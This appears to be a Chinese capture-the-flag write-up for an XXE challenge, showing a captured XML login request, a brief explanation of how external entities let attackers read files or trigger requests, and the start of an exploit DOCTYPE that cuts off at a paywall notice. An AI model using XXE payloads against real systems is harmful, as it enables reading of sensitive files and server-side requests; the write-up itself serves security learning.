题目
POST /doLogin.php HTTP/1.1
Host: node4.anna.nssctf.cn:28258
Content-Length: 62
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: application/xml;charset=UTF-8
Origin: http://node4.anna.nssctf.cn:28258
Referer: http://node4.anna.nssctf.cn:28258/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
<user><username>111</username><password>1111</password></user>
<user><username>111</username><password>1111</password></user>
思路
XXE攻击利用了XML解析器对外部实体的支持,攻击者可以通过构造恶意的XML文档,让解析器加载敏感文件、执行网络请求或造成拒绝服务等
EXP
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
&

最低0.47元/天 解锁文章
516

被折叠的 条评论
为什么被折叠?



